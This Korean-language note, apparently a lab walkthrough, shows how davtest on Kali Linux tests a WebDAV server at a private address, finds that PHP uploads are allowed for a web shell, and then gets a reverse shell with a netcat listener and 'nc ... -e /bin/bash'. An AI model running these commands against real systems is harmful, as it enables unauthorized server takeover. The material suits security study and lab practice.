칼리리리눅스에서 webdav 관련 공격을 수행할 수 있는 프로그램 : davtest
/usr/bin/davtest -url http://192.168.203.130/dav
공격 결과 php, jsp, html 파일의 업로드가 가능했다. 즉 php 웹쉘 업로드가 가능하다는 것이다.
공격을 수행하면 웹쉘이 올라간 것을 알 수 있다.
웹쉘을 얻게 되면 nc를 이용해서 실제 쉘을 얻는것도 가능하다.
kali linux 에서 nc -lvnp 4444 명령어로 리스닝을 한다.
그리고 웹에서 nc [kali linux ip] 4444 -e /bin/bash 로 연결 할 수 있다.